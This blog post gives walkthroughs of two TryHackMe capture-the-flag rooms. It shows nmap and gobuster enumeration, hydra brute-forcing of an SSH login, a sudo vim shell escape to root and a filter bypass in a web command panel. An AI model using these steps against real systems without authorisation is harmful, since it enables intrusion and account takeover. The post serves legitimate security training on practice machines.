Tag: CTF

TryHackMe : Simple CTF

TryHackMe Room : https://tryhackme.com/room/easyctf

Aim : To get to the root of the machine and read the flag file.

Difficulty Level : Easy

Connect to the TryHackMe network using openvpn:

sudo openvpn /path/to/username.ovpn

Scanning and Enumeration

1. How many services are running under port 1000?

sudo nmap -sV --script vuln -p1-10000 -vv "Target Ip"

we have 3 services running on ports 21, 80 , 2222 . we also have a page “/robots.txt” , though it gives us no useful results .

2 .What is running on the higher port?

From above nmap scan , the service running on highest port(2222) is ssh .

3 . What’s the CVE you’re using against the application?

To answer the above question we need to do some more enumeration. I will use tools such as “nikto” and “gobuster” for this purpose . 

nikto -h "Target IP:
we just get the same “robots.txt” here too

We can enumerate the entire domain and can use directory busting to see if there is any thing of interest .Using “gobuster” :

gobuster dir -u "target_ip" -w wordlists/small.txt -t 200 -x .php -q
we got “/simple”,we should check what is there.

upon visiting the url , “/simple” is a CMS system .we also get a version at the very bottom left hand corner of the page:

CMS Made Simple version 2.2.8

To know about the exploits in this version of CMS Made Simple, let’s see exploit-db .

The answer to our 3rd question, we will use: CVE-2019-9053

4. To what kind of vulnerability is the application vulnerable?

It’s already given in above image, SQL Injection.

Exploitation

5. What’s the password?

Now to crack the password , I should at least have a username to bruteforce against. Since on the target machine ftp port 21 is open, it is wise to see if anonymous login is available or not:

we can use any password in most cases of anonymous login
ftp "target IP"
upon doing successful anonymous login , we have a text file and an Idea of username for the target machine.

Now on trying hydra to crack the password for username “mitch”:

hydra -l mitch -P rockyou.txt ssh://10.10.246.98:2222
woah , we have a password . So this will be the answer for this question.

6. Where can you login with the details obtained?

7. What’s the user flag?

we also have an ssh port at 2222 open , doing ssh using credentials for “mitch“:

ssh mitch@10.10.246.98 -p 2222
The output of last command give us the user flag (ques7), answer to question 6 will be ssh.

8. Is there any other user in the home directory? What’s its name?

ls /home
we have one more user ,this will be the answer .

9 . What can you leverage to spawn a privileged shell?

Now , this question is interesting , we need to check the system privilege for user “mitch” :

sudo -l
so , vim will be used to spawn a privileged shell

10. What’s the root flag?

we have permission to run vim as root , with no password required. Doing a little bit of googling , I got this :

Running this command as root :

sudo vim -c ':!/bin/sh'
Now , we have gained root privilege.

we can now find the root flag by :

ls /root -la
The output of last command give us the root flag!

The Machine has been conquered .

TryHackMe : Pickle Rick

TryHackMe Room : https://tryhackme.com/room/picklerick

Aim : Exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Difficulty Level : Easy

Connect to the TryHackMe network using openvpn.

sudo openvpn /path/to/username.ovpn

At first I will open the provided url (will appear in picklerick room page) in firefox, the page we got :

There is nothing present directly on the page. Another thing we can do is , view the source code of the page . We get an username for some login page:

The next thing we should do is: get a password and a login url. For this we can use “gobuster” on entire domain:

gobuster dir -u victim_IP -w /path/to/wordlist/common.txt -t 200 -x .php -q
gobuster dir -u victim_IP -w /path/to/wordlist/common.txt -t 200 -q

we get some interesting results here, going to /robots.txt , we get a text

Well , it is Rick’s nonsense catchphrase.

also we have a /login.php page .

A portal !

upon trying the username we got earlier and this catchphrase as password , we are successfully logged in. We have command panel on which doing ls -la , gives us:

The 1st and 3rd txt file looks interesting.we should read its content
cat Sup3rS3cretPickl3Ingred.txt

hmm, the cat command have been disabled, what can we do is to look for alternative for cat : we have “head”, “tail”, “less” and maybe more. Upon trying head and tail, it seems they have been disabled too , but less works 🙂 , we got the 1st ingredient:

less Sup3rS3cretPickl3Ingred.txt

For the next clue , we will do same with clue.txt file:

less clue.txt
Ain’t it will be fun!

So , we have to explore the filesystem to get more ingredients:

we have got 2 directories worth exploring , “/home” and “/root”, lets go to “/home” first:

let’s see /home/rick now:
well, well , well…
ain’t that funny

we have found our 2nd ingredient ,now let’s go to /root , to see if we can find something of value there:

hmm… , obviously we have to use “sudo”
“3rd.txt”, seems interesting
we have got all the ingredients now!

It’s time to make the potion to transform Rick back into a human from a pickle.

Mission Accomplished
Design a site like this with WordPress.com
Get started